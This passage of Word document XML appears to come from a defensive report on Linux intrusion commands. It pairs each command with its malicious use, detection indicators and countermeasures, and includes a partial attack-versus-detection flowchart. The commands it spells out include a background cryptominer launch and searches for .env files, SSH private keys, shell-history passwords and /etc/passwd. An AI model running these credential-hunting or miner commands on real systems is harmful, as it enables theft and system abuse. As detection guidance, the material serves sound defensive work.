        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-download was the malicious one</w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[11]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Detection: similar to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, but also watch for piping to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Network proxies can also log unusual destinations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nohup /tmp/.apt/kernupd/kernupd &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Launch a process (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kernupd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cryptominer) in the background.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Final step of crypto-miner setup. The article’s cryptominer was launched this way</w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[12]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Alerts: multiple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nohup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">commands by non-root or to unknown binaries, especially writing to unusual dirs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/.apt/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is highly suspicious. CPU spikes from these background jobs also help detection.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="45" w:name="detection-indicators-defensive-actions"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection Indicators &amp; Defensive Actions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Command(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Purpose (Normal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Typical Malicious Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Detection Indicators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Defensive Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Check current user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Privilege check; identify user context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Audit logs showing these by web/server processes</w:t>
            </w:r>
            <w:hyperlink r:id="rId28">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">[4]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">; repeated runs by odd users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alert on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">by non-interactive or service accounts; use process whitelisting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ps aux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">List processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Find running EDR/AV or mining processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ps</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">with</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">grep</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">for keywords; audit entries of</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ps</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">by root-like or unexpected users; process tree mismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Harden EDR (self-protect); monitor critical processes; alert on process-hunting patterns</w:t>
            </w:r>
            <w:hyperlink r:id="rId37">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">[8]</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">last</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Show login history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Recon on active users or stale accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Audit log showing</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">last</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">by attacker user (e.g.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">itsupport</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
            <w:hyperlink r:id="rId35">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">[7]</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Log and review login history accesses; use honeypot accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Network test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ping-sweep network for live hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unusual ICMP bursts; firewall logs of multiple pings/scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Intrusion detection on network scans; rate-limit ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">netstat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Show open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Discover exposed services/ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Automated scanning pattern;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">netstat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">by odd user; high volume logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use host-based firewall; alert on scans; secure key ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">find / -name *.env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Locate env files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Search for credentials/APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unusual broad filesystem searches;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ausearch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">detecting</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">find</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">on root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restrict file permissions; alert on searches for secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">find /home -name id_rsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Find SSH keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Steal private SSH keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Same as above; unusual</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">find</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in user dirs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enforce key management; detect new SSH keys or key-read access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">wget</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Download from URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ingress tools (download malware, miners)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Audit log</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">-x wget/curl</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; downloaded domains (threat intel)</w:t>
            </w:r>
            <w:hyperlink r:id="rId40">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">[10]</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proxy/content-filter; deny exec of downloads; monitor new files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">scp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Copy files over SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Transfer payloads (malware archive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSHD logs of new connections with file transfer</w:t>
            </w:r>
            <w:hyperlink r:id="rId44">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">[13]</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alert on unexpected SSH logins; use 2FA; limit root SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">history | grep pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Search shell history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Extract passwords from history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Logs of history file access; unusual grep on history file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Disable or clear shell history for sensitive accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">List users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Locate accounts to target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Audit on sensitive file reads by non-root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restrict file access; alert if non-root reads sensitive files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(This table highlights how each command can be benign but also abused. For example, the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">command is a red flag when run by a web-server process, since applications rarely need to check their own user</w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">[4]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Defensive actions include logging usage, enforcing least privilege, and using audit rules to catch unusual context.)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="attack-vs-detection-flowchart"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack vs Detection Flowchart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart LR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  subgraph "Attack Flow"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    A(Initial Access: SSH Bruteforce) --&gt; B(Discovery: `uname`,`whoami`,`id`)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    B --&gt; C(Credential Hunt: `find .env`, history grep)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    C --&gt; D(Ingress: `wget`,`curl`,`scp`)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    D --&gt; E(Persistence &amp; Setup: `nohup &lt;miner&gt;`)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    E --&gt; F(Network Scanning: `ping`, `nc` loop)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  subgraph "Detection"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    A --&gt;|Auth Logs: failed/success| Det1["Monitor /var/log/auth.log"]</w:t>
      </w:r>
